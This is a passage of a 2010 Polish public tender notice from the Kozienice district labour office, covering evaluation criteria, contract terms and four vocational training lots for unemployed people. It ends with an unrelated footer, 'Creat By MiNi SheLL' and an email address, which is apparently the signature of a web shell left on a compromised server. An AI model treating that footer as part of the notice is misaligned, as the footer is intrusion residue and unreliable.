<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Kwalifikacje i doświadczenie kadry dydaktycznej - 20</li>
<li>3 - Doświadczenie Wykonawcy - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w szczególnych okoliczności, których nie można przewidzieć w toku niniejszego postępowania w zakresie:
-przesunięcia terminu realizacji przedmiotu zamówienia
-zmiany harmonogramu zajęć
-zmiany wykładowcy (o kwalifikacjach nie niższych niż podane w ofercie wykonawcy)
- Zmniejszenia liczby osób skierowanych na szkolenie w przypadku, braku zakładanej liczby osób bezrobotnych chętnych do udziału w szkoleniu
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy. W takim przypadku Wykonawca może żądać wynagrodzenia należnego z tytułu wykonania części umowy.
Zmiany postanowień zawartej umowy wymagają dla swej ważności formy pisemnej    w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupkozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kozienicach ul. Zdziczów 1 26-900 Kozienice, pokój  nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Kozienicach ul. Zdziczów 1 26-900 Kozienice, Sekretariat - pokój  nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca  z obsługą kas fiskalnych oraz umiejętnością  fakturowania + HACCP  dla 20 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia w zakresie: Sprzedawca z  obsługą kas fiskalnych oraz umiejętnością  fakturowania + HACCP  dla 20 osób bezrobotnych ze środków Funduszu Pracy. Celem szkolenia jest przygotowanie uczestników szkolenia do pracy na stanowisku sprzedawca, nabycie przez nich wiedzy i umiejętności teoretycznych i praktycznych  niezbędnych do obsługi kas fiskalnych, fakturowania komputerowego oraz zapoznanie     z zasadami i funkcjonowaniem systemu HACCP.  Wymagana liczba godzin szkolenia: 130 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 95 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły tematyczne: I. Podstawowe zagadnienia z zakresu nowoczesnych technik sprzedaży, II. Podstawy towaroznawstwa, organizacji pracy w sklepie, inwentaryzacji, organizacji   zaopatrzenia, III. Sprzedaż (techniki sprzedaży, dokumentacja sprzedaży i podstawowe obliczenia sklepowe, czynności rachunkowo-kasowe, magazynowanie towarów, profesjonalna obsługa klienta, etyka w zawodzie sprzedawcy),  IV. Szkolenie w zakresie HACCP,  V.  Podstawy obsługi komputera (podstawy obsługi komputera w systemie Windows XP, MS Word, MS Excel, Internet, Microsoft Outlook), VI. Fakturowanie komputerowe,  VII. Obsługa kas fiskalnych,  VIII. Marketing i negocjacje. Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje i doświadczenie kadry dydaktycznej - 20</li>
<li>3. Doświadczenie Wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kosmetyka, wizaż, stylizacja paznokci  dla  12 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja  szkolenia  w zakresie: Kosmetyka, wizaż, stylizacja paznokci  dla 12 osób bezrobotnych ze środków Funduszu Pracy. Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy oraz umiejętności teoretycznych  i praktycznych z zakresu kosmetyki, wizażu i zdobnictwa paznokci. Wymagana liczba godzin szkolenia:  150 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 112 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły  tematyczne:  I.  Kosmetyka-wizaż ( dermatologia, kosmetologia, analiza kolorystyczna, wizaż, techniki przeprowadzania zabiegów pielęgnacyjnych i upiększających, zasady  i techniki wykonywania  makijażu dziennego, zasady i techniki wykonywania makijażu wieczorowego, trendy   w makijażu),  II. Stylizacja paznokci ( budowa  , modelowanie i pielęgnacja paznokci - manicure, pedicure, przedłużanie i modelowanie paznokci metodą: żelową, akrylową, fiberglass,  uzupełnianie akrylu i żelu, malowanie i zdobienie paznokci, dezynfekcja w gabinecie kosmetycznym). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Kwalifikacje i doświadczenie kadry dydaktycznej - 20</li>
<li>3. Doświadczenie Wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych    dla  17 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja  szkolenia  w zakresie  Pracownik ds. kadrowych i płacowych z obsługą programów użytkowych dla 17 osób bezrobotnych ze środków Funduszu Pracy. Celem  szkolenia jest przygotowanie uczestników szkolenia do pracy w charakterze pracownika kadrowo-płacowego i uzyskanie przez nich wiedzy i umiejętności praktycznych   z zakresu kadr, płac i  obsługi programów użytkowych. Wymagana liczba godzin szkolenia: 150 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 100 godzin zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące moduły  tematyczne: I.  Kadry ( organizacja stanowiska pracy ds. kadrowych, obowiązujące akty prawne, wybrane zagadnienia prawa pracy m.in :zawarcie stosunku pracy, umowy o pracę, zasady rozwiązywania umów o pracę, czas pracy i jego planowanie, urlopy pracownicze, świadczenia dla pracowników, odpowiedzialność prawna w stosunkach pracy,  prowadzenie dokumentacji kadrowej, BHP i ppoż, obsługa  programów kadrowych), II. Płace         ( organizacja pracy pracownika ds. płac, podstawy prawne i zasady ustalania wynagrodzeń, finanse, podatki, ubezpieczenia społeczne, rozliczenia z ZUS i US, naliczanie wynagrodzenia za pracę, listy płac,  rozliczanie innych świadczeń  niż wynagrodzenia ze stosunku pracy, zasiłki, rozliczanie funduszu pracy, gwarantowanych świadczeń pracowniczych, III. Komputer (obsługa programów użytkowych: Płatnik ,  Symfonia-moduł Kadry i Płace oraz innych   wybranych programów kadrowo-płacowych). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zorganizowanie i przeprowadzenie szkolenia  w zakresie  Podstawy obsługi komputera z fakturowaniem komputerowym  dla 18 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja  szkolenia  w zakresie  Podstawy obsługi komputera z fakturowaniem komputerowym  dla 18 osób bezrobotnych ze środków Funduszu Pracy. Celem  szkolenia jest  nabycie przez uczestników szkolenia wiedzy i umiejętności związanych   z podstawową obsługą komputera, elementarnych programów komputerowych, fakturowaniem komputerowym oraz podniesienie wiedzy ogólnej uczestników kursu.  Wymagana liczba godzin szkolenia: 80 godzin zegarowych ogółem na jednego uczestnika szkolenia, w tym minimum 64 godziny zegarowych szkolenia praktycznego. Szkolenie powinno obejmować następujące zagadnienia: Podstawy działania komputera i jego obsługi- wprowadzenie do Windows XP, System operacyjny MS Windows XP  (składniki systemu, struktura folderów i plików, poruszanie się po systemie), Klasyfikacja   i przegląd programów komputerowych (systemy operacyjne, programy biurowe, programy użytkowe), Praca z edytorem tekstu Microsoft Word, Praca z arkuszem kalkulacyjnym Microsoft  Excel, Praca z programem prezentacyjnym Microsoft PowerPoint, Internet    i poczta  elektroniczna  (Microsoft Outlook i Outlook Express), Oprogramowanie zabezpieczające komputer- instalowanie, aktualizacja, Multimedia ( CD, DVD, MP3, PenDrive itp.), Fakturowanie  komputerowe  (zapoznanie z  zasadami  i operacjami fakturowania oraz programami  do fakturowania). Przedmiot zamówienia obejmuje także zorganizowanie egzaminu końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com